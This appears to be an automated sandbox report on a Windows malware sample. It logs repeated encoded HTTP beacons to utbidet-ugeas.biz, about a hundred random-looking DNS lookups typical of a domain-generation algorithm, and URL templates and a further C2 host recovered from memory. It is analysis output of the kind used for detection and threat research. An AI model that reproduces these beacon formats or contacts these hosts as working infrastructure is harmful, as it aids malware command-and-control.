Source: global trafficHTTP traffic detected: GET /d/N?022E17715D2917715D1C17595D2E17FF8EBA2FD9072F17B1F52C1447731C39486F1E275F5D HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?027A06F3CB7D06F3CB4806DBCB7A067D18EE3E5B917B0633637805C5E54828CAF94A36DDCB HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?027A06F3CB7D06F3CB4806DBCB7A067D18EE3E5B917B0633637805C5E54828CAF94A36DDCB HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?0266CF5C6661CF5C6654CF746666CFD2B5F2F7F43C67CF9CCE64CC6A4854E1655456FF7266 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?0266CF5C6661CF5C6654CF746666CFD2B5F2F7F43C67CF9CCE64CC6A4854E1655456FF7266 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?0292F796E195F796E1A0F7BEE192F7183206CF3EBB93F7564990F4A0CFA0D9AFD3A2C7B8E1 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?0292F796E195F796E1A0F7BEE192F7183206CF3EBB93F7564990F4A0CFA0D9AFD3A2C7B8E1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?025868AC8A5F68AC8A6A68848A58682259CC5004D059686C225A6B9AA46A4695B86858828A HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?025868AC8A5F68AC8A6A68848A58682259CC5004D059686C225A6B9AA46A4695B86858828A HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?023F07D6873807D6870D07FE873F075854AB3F7EDD3E07162F3D04E0A90D29EFB50F37F887 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?023F07D6873807D6870D07FE873F075854AB3F7EDD3E07162F3D04E0A90D29EFB50F37F887 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?0228AD75372FAD75371AAD5D3728ADFBE4BC95DD6D29ADB59F2AAE43191A834C05189D5B37 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?0228AD75372FAD75371AAD5D3728ADFBE4BC95DD6D29ADB59F2AAE43191A834C05189D5B37 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?025ACD535A5DCD535A68CD7B5A5ACDDD89CEF5FB005BCD93F258CE657468E36A686AFD7D5A HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?025ACD535A5DCD535A68CD7B5A5ACDDD89CEF5FB005BCD93F258CE657468E36A686AFD7D5A HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?024859D5D44F59D5D47A59FDD448595B07DC617D8E4959157C4A5AE3FA7A77ECE67869FBD4 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?024859D5D44F59D5D47A59FDD448595B07DC617D8E4959157C4A5AE3FA7A77ECE67869FBD4 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?02C4799EC2C3799EC2F679B6C2C479101150413698C5795E6AC67AA8ECF657A7F0F449B0C2 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?02C4799EC2C3799EC2F679B6C2C479101150413698C5795E6AC67AA8ECF657A7F0F449B0C2 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?029975A1079E75A107AB75890799752FD40D4D095D987561AF9B769729AB5B9835A9458F07 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?029975A1079E75A107AB75890799752FD40D4D095D987561AF9B769729AB5B9835A9458F07 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?02146C369F136C369F266C1E9F146CB84C80549EC5156CF637166F00B126420FAD245C189F HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?02146C369F136C369F266C1E9F146CB84C80549EC5156CF637166F00B126420FAD245C189F HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?0285DF63EC82DF63ECB7DF4BEC85DFED3F11E7CBB684DFA34487DC55C2B7F15ADEB5EF4DEC HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?0285DF63EC82DF63ECB7DF4BEC85DFED3F11E7CBB684DFA34487DC55C2B7F15ADEB5EF4DEC HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?029C5E69069B5E6906AE5E41069C5EE7D50866C15C9D5EA9AE9E5D5F28AE705034AC6E4706 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?029C5E69069B5E6906AE5E41069C5EE7D50866C15C9D5EA9AE9E5D5F28AE705034AC6E4706 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?02F85E4FC9FF5E4FC9CA5E67C9F85EC11A6C66E793F95E8F61FA5D79E7CA7076FBC86E61C9 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?02F85E4FC9FF5E4FC9CA5E67C9F85EC11A6C66E793F95E8F61FA5D79E7CA7076FBC86E61C9 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?025434EAA65334EAA66634C2A654346475C00C42FC55342A0E5637DC88661AD3946404C4A6 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?025434EAA65334EAA66634C2A654346475C00C42FC55342A0E5637DC88661AD3946404C4A6 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?02DE65FDB3D965FDB3EC65D5B3DE6573604A5D55E9DF653D1BDC66CB9DEC4BC481EE55D3B3 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?02DE65FDB3D965FDB3EC65D5B3DE6573604A5D55E9DF653D1BDC66CB9DEC4BC481EE55D3B3 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?02DFBDD99DD8BDD99DEDBDF19DDFBD574E4B8571C7DEBD1935DDBEEFB3ED93E0AFEF8DF79D HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?02DFBDD99DD8BDD99DEDBDF19DDFBD574E4B8571C7DEBD1935DDBEEFB3ED93E0AFEF8DF79D HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?028C8677478B867747BE865F478C86F99418BEDF1D8D86B7EF8E854169BEA84E75BCB65947 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?028C8677478B867747BE865F478C86F99418BEDF1D8D86B7EF8E854169BEA84E75BCB65947 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?023563DBDB3263DBDB0763F3DB35635508A15B738134631B733760EDF5074DE2E90553F5DB HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?023563DBDB3263DBDB0763F3DB35635508A15B738134631B733760EDF5074DE2E90553F5DB HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?02AA0963E6AD0963E698094BE6AA09ED353E31CBBCAB09A34EA80A55C898275AD49A394DE6 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?02AA0963E6AD0963E698094BE6AA09ED353E31CBBCAB09A34EA80A55C898275AD49A394DE6 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?022E17715D2917715D1C17595D2E17FF8EBA2FD9072F17B1F52C1447731C39486F1E275F5D HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?022E17715D2917715D1C17595D2E17FF8EBA2FD9072F17B1F52C1447731C39486F1E275F5D HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?027A06F3CB7D06F3CB4806DBCB7A067D18EE3E5B917B0633637805C5E54828CAF94A36DDCB HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?027A06F3CB7D06F3CB4806DBCB7A067D18EE3E5B917B0633637805C5E54828CAF94A36DDCB HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?0266CF5C6661CF5C6654CF746666CFD2B5F2F7F43C67CF9CCE64CC6A4854E1655456FF7266 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?0266CF5C6661CF5C6654CF746666CFD2B5F2F7F43C67CF9CCE64CC6A4854E1655456FF7266 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?0292F796E195F796E1A0F7BEE192F7183206CF3EBB93F7564990F4A0CFA0D9AFD3A2C7B8E1 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?0292F796E195F796E1A0F7BEE192F7183206CF3EBB93F7564990F4A0CFA0D9AFD3A2C7B8E1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?025868AC8A5F68AC8A6A68848A58682259CC5004D059686C225A6B9AA46A4695B86858828A HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?025868AC8A5F68AC8A6A68848A58682259CC5004D059686C225A6B9AA46A4695B86858828A HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?023F07D6873807D6870D07FE873F075854AB3F7EDD3E07162F3D04E0A90D29EFB50F37F887 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?023F07D6873807D6870D07FE873F075854AB3F7EDD3E07162F3D04E0A90D29EFB50F37F887 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?0228AD75372FAD75371AAD5D3728ADFBE4BC95DD6D29ADB59F2AAE43191A834C05189D5B37 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?0228AD75372FAD75371AAD5D3728ADFBE4BC95DD6D29ADB59F2AAE43191A834C05189D5B37 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?025ACD535A5DCD535A68CD7B5A5ACDDD89CEF5FB005BCD93F258CE657468E36A686AFD7D5A HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?025ACD535A5DCD535A68CD7B5A5ACDDD89CEF5FB005BCD93F258CE657468E36A686AFD7D5A HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?024859D5D44F59D5D47A59FDD448595B07DC617D8E4959157C4A5AE3FA7A77ECE67869FBD4 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?024859D5D44F59D5D47A59FDD448595B07DC617D8E4959157C4A5AE3FA7A77ECE67869FBD4 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?02C4799EC2C3799EC2F679B6C2C479101150413698C5795E6AC67AA8ECF657A7F0F449B0C2 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?02C4799EC2C3799EC2F679B6C2C479101150413698C5795E6AC67AA8ECF657A7F0F449B0C2 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?029975A1079E75A107AB75890799752FD40D4D095D987561AF9B769729AB5B9835A9458F07 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?029975A1079E75A107AB75890799752FD40D4D095D987561AF9B769729AB5B9835A9458F07 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?02146C369F136C369F266C1E9F146CB84C80549EC5156CF637166F00B126420FAD245C189F HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?02146C369F136C369F266C1E9F146CB84C80549EC5156CF637166F00B126420FAD245C189F HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?0285DF63EC82DF63ECB7DF4BEC85DFED3F11E7CBB684DFA34487DC55C2B7F15ADEB5EF4DEC HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?0285DF63EC82DF63ECB7DF4BEC85DFED3F11E7CBB684DFA34487DC55C2B7F15ADEB5EF4DEC HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?029C5E69069B5E6906AE5E41069C5EE7D50866C15C9D5EA9AE9E5D5F28AE705034AC6E4706 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?029C5E69069B5E6906AE5E41069C5EE7D50866C15C9D5EA9AE9E5D5F28AE705034AC6E4706 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d/N?02F85E4FC9FF5E4FC9CA5E67C9F85EC11A6C66E793F95E8F61FA5D79E7CA7076FBC86E61C9 HTTP/1.0Host: utbidet-ugeas.bizUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Source: global trafficHTTP traffic detected: GET /d/N?02F85E4FC9FF5E4FC9CA5E67C9F85EC11A6C66E793F95E8F61FA5D79E7CA7076FBC86E61C9 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)Host: utbidet-ugeas.bizCache-Control: no-cache
Source: global trafficDNS traffic detected: DNS query: gmomhogqcqo.rw
Source: global trafficDNS traffic detected: DNS query: gcqiwuurhamq.ws
Source: global trafficDNS traffic detected: DNS query: utbidet-ugeas.biz
Source: global trafficDNS traffic detected: DNS query: qhncbseaikqo.rw
Source: global trafficDNS traffic detected: DNS query: msqnej.ws
Source: global trafficDNS traffic detected: DNS query: qsmnhmikgb.ws
Source: global trafficDNS traffic detected: DNS query: muizcaelkbpus.ws
Source: global trafficDNS traffic detected: DNS query: ssgum.cg
Source: global trafficDNS traffic detected: DNS query: daqpka.kr
Source: global trafficDNS traffic detected: DNS query: bgrauma.tk
Source: global trafficDNS traffic detected: DNS query: uesvxrdym.mp
Source: global trafficDNS traffic detected: DNS query: taesmoqeisc.st
Source: global trafficDNS traffic detected: DNS query: haofpecu.vg
Source: global trafficDNS traffic detected: DNS query: ipemvw.mp
Source: global trafficDNS traffic detected: DNS query: kwdscx.ws
Source: global trafficDNS traffic detected: DNS query: lhorellqnmqnh.rw
Source: global trafficDNS traffic detected: DNS query: yamijoovw.ws
Source: global trafficDNS traffic detected: DNS query: wrrfiqelyzq.ws
Source: global trafficDNS traffic detected: DNS query: cmujuqlmdkg.cm
Source: global trafficDNS traffic detected: DNS query: ecumwls.mp
Source: global trafficDNS traffic detected: DNS query: fyuciecxgldyb.ws
Source: global trafficDNS traffic detected: DNS query: cwgbto.cm
Source: global trafficDNS traffic detected: DNS query: vcmiwoi.ws
Source: global trafficDNS traffic detected: DNS query: nnwivnbqu.nu
Source: global trafficDNS traffic detected: DNS query: iftwbsbhi.st
Source: global trafficDNS traffic detected: DNS query: imctsikhqfmox.st
Source: global trafficDNS traffic detected: DNS query: wkgxyjabnhynde.vg
Source: global trafficDNS traffic detected: DNS query: kowrxnw.cm
Source: global trafficDNS traffic detected: DNS query: xytag.rw
Source: global trafficDNS traffic detected: DNS query: xnzakgk.kr
Source: global trafficDNS traffic detected: DNS query: gimamgpmfgycu.rw
Source: global trafficDNS traffic detected: DNS query: lfcwiw.ph
Source: global trafficDNS traffic detected: DNS query: vnsudgrujuqaw.vg
Source: global trafficDNS traffic detected: DNS query: menrzwzda.kr
Source: global trafficDNS traffic detected: DNS query: goejwtwioknhq.mp
Source: global trafficDNS traffic detected: DNS query: oigqdcmjr.cg
Source: global trafficDNS traffic detected: DNS query: unmzmwhqqjn.tk
Source: global trafficDNS traffic detected: DNS query: iuzmbo.cm
Source: global trafficDNS traffic detected: DNS query: zaspgiv.tk
Source: global trafficDNS traffic detected: DNS query: kccsaqgsvsa.rw
Source: global trafficDNS traffic detected: DNS query: rgqgidaugywcg.ph
Source: global trafficDNS traffic detected: DNS query: dqfudtqqvpha.st
Source: global trafficDNS traffic detected: DNS query: btmcgia.ws
Source: global trafficDNS traffic detected: DNS query: ihigogb.cm
Source: global trafficDNS traffic detected: DNS query: uduywyte.st
Source: global trafficDNS traffic detected: DNS query: geocssarlwqkae.ws
Source: global trafficDNS traffic detected: DNS query: niror.rw
Source: global trafficDNS traffic detected: DNS query: pqqembk.vg
Source: global trafficDNS traffic detected: DNS query: ukikcexuo.st
Source: global trafficDNS traffic detected: DNS query: eksogaqiy.kr
Source: global trafficDNS traffic detected: DNS query: gwzyu.ph
Source: global trafficDNS traffic detected: DNS query: eqcdijeomajywh.rw
Source: global trafficDNS traffic detected: DNS query: yebwfcrq.mp
Source: global trafficDNS traffic detected: DNS query: ywynxne.rw
Source: global trafficDNS traffic detected: DNS query: cefal.ph
Source: global trafficDNS traffic detected: DNS query: eiluyai.mp
Source: global trafficDNS traffic detected: DNS query: kkrsmqksico.ws
Source: global trafficDNS traffic detected: DNS query: wlopqesa.ws
Source: global trafficDNS traffic detected: DNS query: gceocrmsm.ph
Source: global trafficDNS traffic detected: DNS query: aynyrapy.mp
Source: global trafficDNS traffic detected: DNS query: loucml.rw
Source: global trafficDNS traffic detected: DNS query: igeeqesxawmwom.tk
Source: global trafficDNS traffic detected: DNS query: numuqgoyj.nu
Source: global trafficDNS traffic detected: DNS query: owpuc.cg
Source: global trafficDNS traffic detected: DNS query: mxeye.ph
Source: global trafficDNS traffic detected: DNS query: ulwbq.cm
Source: global trafficDNS traffic detected: DNS query: iksgub.kr
Source: global trafficDNS traffic detected: DNS query: skkawq.ph
Source: global trafficDNS traffic detected: DNS query: quoxyyhgwkw.vg
Source: global trafficDNS traffic detected: DNS query: kuhoi.rw
Source: global trafficDNS traffic detected: DNS query: znful.kr
Source: global trafficDNS traffic detected: DNS query: nuijfgm.st
Source: global trafficDNS traffic detected: DNS query: owzuhlkauoavrg.rw
Source: global trafficDNS traffic detected: DNS query: goqcygcoo.ph
Source: global trafficDNS traffic detected: DNS query: kamqc.tk
Source: global trafficDNS traffic detected: DNS query: jkknameib.vg
Source: global trafficDNS traffic detected: DNS query: pwoawmujdqwzs.mp
Source: global trafficDNS traffic detected: DNS query: exmqudoi.cm
Source: global trafficDNS traffic detected: DNS query: dqagvyickrk.nu
Source: global trafficDNS traffic detected: DNS query: useeru.cm
Source: global trafficDNS traffic detected: DNS query: xqeappl.mp
Source: global trafficDNS traffic detected: DNS query: wkuzdqsoiwy.kr
Source: global trafficDNS traffic detected: DNS query: ioiqqswzikfqu.kr
Source: global trafficDNS traffic detected: DNS query: ypnuaffmx.vg
Source: global trafficDNS traffic detected: DNS query: oigusewa.vg
Source: global trafficDNS traffic detected: DNS query: ocjaqgnsqfgp.mp
Source: global trafficDNS traffic detected: DNS query: pmoodvkmiigul.vg
Source: global trafficDNS traffic detected: DNS query: ndqcy.ws
Source: global trafficDNS traffic detected: DNS query: hvvgycugwh.mp
Source: global trafficDNS traffic detected: DNS query: esqkgcss.ph
Source: global trafficDNS traffic detected: DNS query: ithzdymit.tk
Source: global trafficDNS traffic detected: DNS query: uvwabzkyifixf.tk
Source: global trafficDNS traffic detected: DNS query: kuikdooag.cg
Source: global trafficDNS traffic detected: DNS query: kpntwewjtai.tk
Source: global trafficDNS traffic detected: DNS query: kwfciphqs.st
Source: global trafficDNS traffic detected: DNS query: xugukhmkcsvw.st
Source: global trafficDNS traffic detected: DNS query: nukeecapkuanq.cg
Source: global trafficDNS traffic detected: DNS query: gyjdfapyghm.st
Source: global trafficDNS traffic detected: DNS query: oooaehqkyge.tk
Source: global trafficDNS traffic detected: DNS query: wcwxa.ws
Source: 5SGOAKv7AR.exe, 5SGOAKv7AR.exe, 00000000.00000002.1354440542.0000000000407000.00000004.00000001.01000000.00000003.sdmp, edsuvoov-usum.exe, edsuvoov-usum.exe, 00000001.00000002.3817514137.0000000000407000.00000004.00000001.01000000.00000004.sdmpString found in binary or memory: http://%s.biz/d/G?
Source: 5SGOAKv7AR.exe, 5SGOAKv7AR.exe, 00000000.00000002.1354440542.0000000000407000.00000004.00000001.01000000.00000003.sdmp, edsuvoov-usum.exe, edsuvoov-usum.exe, 00000001.00000002.3817514137.0000000000407000.00000004.00000001.01000000.00000004.sdmpString found in binary or memory: http://%s.biz/d/N?
Source: 5SGOAKv7AR.exe, 00000000.00000002.1354440542.0000000000407000.00000004.00000001.01000000.00000003.sdmp, edsuvoov-usum.exe, 00000001.00000002.3817514137.0000000000407000.00000004.00000001.01000000.00000004.sdmpString found in binary or memory: http://%s.biz/d/N?http://%s.biz/d/G?http://%s/d/rpt?%smodemisdn%u.%u.%u.%s
Source: edsuvoov-usum.exe, 00000001.00000003.3435492600.00000000007D4000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3409196391.00000000007D4000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3497300445.00000000007D4000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000002.3817754289.000000000074E000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3393132219.00000000007CD000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3531692273.00000000007D4000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3393274054.00000000007D3000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3480072576.00000000007D4000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3420778731.00000000007D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://akpzumsigtkmmw.mp/
Source: edsuvoov-usum.exe, 00000001.00000003.3435492600.00000000007D4000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3409196391.00000000007D4000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3497300445.00000000007D4000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3393132219.00000000007CD000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3393274054.00000000007D3000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3480072576.00000000007D4000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3420778731.00000000007D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://akpzumsigtkmmw.mp/.
Source: edsuvoov-usum.exe, 00000001.00000003.3435492600.00000000007D4000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3409196391.00000000007D4000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3497300445.00000000007D4000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3393132219.00000000007CD000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3393274054.00000000007D3000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3480072576.00000000007D4000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3420778731.00000000007D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://akpzumsigtkmmw.mp/DB
Source: edsuvoov-usum.exe, 00000001.00000002.3817754289.000000000074E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://akpzumsigtkmmw.mp/pati
